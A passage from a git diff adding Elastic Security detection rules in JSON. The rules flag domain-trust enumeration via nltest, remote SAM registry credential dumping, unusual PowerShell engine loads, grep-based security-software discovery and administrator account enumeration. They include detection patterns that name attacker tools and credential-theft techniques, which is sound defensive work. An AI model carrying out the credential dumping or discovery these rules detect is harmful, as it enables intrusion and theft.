NLTEST.EXE\n\nActive Directory (AD) domain trusts define relationships between domains within a Windows AD environment. In this setup, a \"trusting\" domain permits users from a \"trusted\" domain to access resources. These trust relationships can be configurable as one-way, two-way, transitive, or non-transitive, enabling controlled access and resource sharing across domains.\n\nThis rule identifies the usage of the `nltest.exe` utility to enumerate domain trusts. Attackers can use this information to enable the next actions in a target environment, such as lateral movement.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation and are done within the user business context (e.g., an administrator in this context). As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- Enumerating Domain Trusts via DSQUERY.EXE - 06a7a03c-c735-47a6-a313-51c354aef6c3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"nltest.exe\" and process.args : (\n \"/DCLIST:*\", \"/DCNAME:*\", \"/DSGET*\",\n \"/LSAQUERYFTI:*\", \"/PARENTDOMAIN\",\n \"/DOMAIN_TRUSTS\", \"/BDC_QUERY:*\"\n ) and \nnot process.parent.name : \"PDQInventoryScanner.exe\" and \nnot user.id in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")\n", + "references": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "84da2554-e12a-11ec-b896-f661ea17fbcd", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1482", + "name": "Domain Trust Discovery", + "reference": "https://attack.mitre.org/techniques/T1482/" + }, + { + "id": "T1018", + "name": "Remote System Discovery", + "reference": "https://attack.mitre.org/techniques/T1018/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "84da2554-e12a-11ec-b896-f661ea17fbcd_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_110.json b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_110.json new file mode 100644 index 00000000000..9a404282fa2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_110.json @@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies remote access to the registry to potentially dump credential data from the Security Account Manager (SAM) registry hive in preparation for credential access and privileges elevation.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Remote Credential Access via Registry", + "note": "## Triage and analysis\n\n### Investigating Potential Remote Credential Access via Registry\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, such as the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can use tools like secretsdump.py or CrackMapExec to dump the registry hives remotely, and use dumped credentials to access other systems in the domain.\n\n#### Possible investigation steps\n\n- Identify the specifics of the involved assets, such as their role, criticality, and associated users.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Determine the privileges of the compromised accounts.\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target host.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine if other hosts were compromised.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Ensure that the machine has the latest security updates and is not running unsupported Windows versions.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and\n event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size >= 30000 and\n file.path : (\"?:\\\\Windows\\\\system32\\\\*.tmp\", \"?:\\\\WINDOWS\\\\Temp\\\\*.tmp\")\n", + "references": [ + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.size", + "type": "long" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "850d901a-2a3c-46c6-8b22-55398a01aad8", + "setup": "## Setup\n\nThis rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "850d901a-2a3c-46c6-8b22-55398a01aad8_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_111.json b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_111.json new file mode 100644 index 00000000000..38b8537b6ff --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_111.json @@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies remote access to the registry to potentially dump credential data from the Security Account Manager (SAM) registry hive in preparation for credential access and privileges elevation.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Remote Credential Access via Registry", + "note": "## Triage and analysis\n\n### Investigating Potential Remote Credential Access via Registry\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, such as the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can use tools like secretsdump.py or CrackMapExec to dump the registry hives remotely, and use dumped credentials to access other systems in the domain.\n\n#### Possible investigation steps\n\n- Identify the specifics of the involved assets, such as their role, criticality, and associated users.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Determine the privileges of the compromised accounts.\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target host.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine if other hosts were compromised.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Ensure that the machine has the latest security updates and is not running unsupported Windows versions.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and\n event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size >= 30000 and\n file.path : (\"?:\\\\Windows\\\\system32\\\\*.tmp\", \"?:\\\\WINDOWS\\\\Temp\\\\*.tmp\")\n", + "references": [ + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.size", + "type": "long" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "850d901a-2a3c-46c6-8b22-55398a01aad8", + "setup": "## Setup\n\nThis rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "850d901a-2a3c-46c6-8b22-55398a01aad8_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_210.json b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_210.json new file mode 100644 index 00000000000..a3b63249a53 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_210.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the PowerShell engine being invoked by unexpected processes. Rather than executing PowerShell functionality with powershell.exe, some attackers do this to operate more stealthily.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.library-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious PowerShell Engine ImageLoad", + "new_terms_fields": [ + "host.id", + "process.executable", + "user.id" + ], + "note": "## Triage and analysis\n\n### Investigating Suspicious PowerShell Engine ImageLoad\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell without having to execute `PowerShell.exe` directly. This technique, often called \"PowerShell without PowerShell,\" works by using the underlying System.Management.Automation namespace and can bypass application allowlisting and PowerShell security features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Retrieve the implementation (DLL, executable, etc.) and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. Some vendors have their own PowerShell implementations that are shipped with some products. These benign true positives (B-TPs) can be added as exceptions if necessary after analysis.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type:windows and event.category:library and \n dll.name:(\"System.Management.Automation.dll\" or \"System.Management.Automation.ni.dll\") and \n not (\n process.code_signature.subject_name:(\"Microsoft Corporation\" or \"Microsoft Dynamic Code Publisher\" or \"Microsoft Windows\") and process.code_signature.trusted:true and not process.name.caseless:(\"regsvr32.exe\" or \"rundll32.exe\")\n ) and \n not (\n process.executable.caseless:(C\\:\\\\Program*Files*\\(x86\\)\\\\*.exe or C\\:\\\\Program*Files\\\\*.exe) and\n process.code_signature.trusted:true\n ) and \n not (\n process.executable.caseless: C\\:\\\\Windows\\\\Lenovo\\\\*.exe and process.code_signature.subject_name:\"Lenovo\" and \n process.code_signature.trusted:true\n ) and \n not (\n process.executable.caseless: \"C:\\\\ProgramData\\\\chocolatey\\\\choco.exe\" and\n process.code_signature.subject_name:\"Chocolatey Software, Inc.\" and process.code_signature.trusted:true\n ) and not process.executable.caseless : \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": false, + "name": "process.executable.caseless", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.name.caseless", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "852c1f19-68e8-43a6-9dce-340771fe1be3", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 210 + }, + "id": "852c1f19-68e8-43a6-9dce-340771fe1be3_210", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_109.json b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_109.json new file mode 100644 index 00000000000..e88acd4d55a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_109.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of the grep command to discover known third-party macOS and Linux security tools, such as Antivirus or Host Firewall details.", + "false_positives": [ + "Endpoint Security installers, updaters and post installation verification scripts." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "auditbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Security Software Discovery via Grep", + "note": "## Triage and analysis\n\n### Investigating Security Software Discovery via Grep\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `grep` utility with arguments compatible to the enumeration of the security software installed on the host. Attackers can use this information to decide whether or not to infect a system, disable protections, use bypasses, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where event.type == \"start\" and\nprocess.name : \"grep\" and user.id != \"0\" and\n not process.parent.executable : (\"/Library/Application Support/*\", \"/opt/McAfee/agent/scripts/ma\") and\n process.args :\n (\"Little Snitch*\",\n \"Avast*\",\n \"Avira*\",\n \"ESET*\",\n \"BlockBlock*\",\n \"360Sec*\",\n \"LuLu*\",\n \"KnockKnock*\",\n \"kav\",\n \"KIS\",\n \"RTProtectionDaemon*\",\n \"Malware*\",\n \"VShieldScanner*\",\n \"WebProtection*\",\n \"webinspectord*\",\n \"McAfee*\",\n \"isecespd*\",\n \"macmnsvc*\",\n \"masvc*\",\n \"kesl*\",\n \"avscan*\",\n \"guard*\",\n \"rtvscand*\",\n \"symcfgd*\",\n \"scmdaemon*\",\n \"symantec*\",\n \"sophos*\",\n \"osquery*\",\n \"elastic-endpoint*\"\n ) and\n not (\n (process.args : \"Avast\" and process.args : \"Passwords\") or\n (process.parent.args : \"/opt/McAfee/agent/scripts/ma\" and process.parent.args : \"checkhealth\") or\n (process.command_line : (\n \"grep ESET Command-line scanner, version %s -A2\",\n \"grep -i McAfee Web Gateway Core version:\",\n \"grep --color=auto ESET Command-line scanner, version %s -A2\"\n )\n ) or\n (process.parent.command_line : (\n \"\"\"sh -c printf \"command_start_%s\"*; perl -pe 's/[^ -~]/\\n/g' < /opt/eset/esets/sbin/esets_scan | grep 'ESET Command-line scanner, version %s' -A2 | tail -1; printf \"command_done_%s*\"\"\",\n \"\"\"bash -c perl -pe 's/[^ -~]/\\n/g' < /opt/eset/esets/sbin/esets_scan | grep 'ESET Command-line scanner, version %s' -A2 | tail -1\"\"\"\n )\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "870aecc0-cea4-4110-af3f-e02e9b373655", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1518", + "name": "Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/", + "subtechnique": [ + { + "id": "T1518.001", + "name": "Security Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "870aecc0-cea4-4110-af3f-e02e9b373655_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_111.json b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_111.json new file mode 100644 index 00000000000..b1e68be9f3b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_111.json @@ -0,0 +1,136 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances of lower privilege accounts enumerating Administrator accounts or groups using built-in Windows tools.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Enumeration of Administrator Accounts", + "note": "## Triage and analysis\n\n### Investigating Enumeration of Administrator Accounts\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `net` and `wmic` utilities to enumerate administrator-related users or groups in the domain and local machine scope. Attackers can use this information to plan their next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- AdFind Command Activity - eda499b8-a073-4e35-9733-22ec71f57f3a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (\n (\n (process.name : \"net.exe\" or ?process.pe.original_file_name == \"net.exe\") or\n ((process.name : \"net1.exe\" or ?process.pe.original_file_name == \"net1.exe\") and not process.parent.name : \"net.exe\")\n ) and\n process.args : (\"group\", \"user\", \"localgroup\") and\n process.args : (\"*admin*\", \"Domain Admins\", \"Remote Desktop Users\", \"Enterprise Admins\", \"Organization Management\")\n and not process.args : (\"/add\", \"/delete\")\n ) or\n (\n (process.name : \"wmic.exe\" or ?process.pe.original_file_name == \"wmic.exe\") and\n process.args : (\"group\", \"useraccount\")\n )\n) and not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "871ea072-1b71-4def-b016-6278b505138d", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": 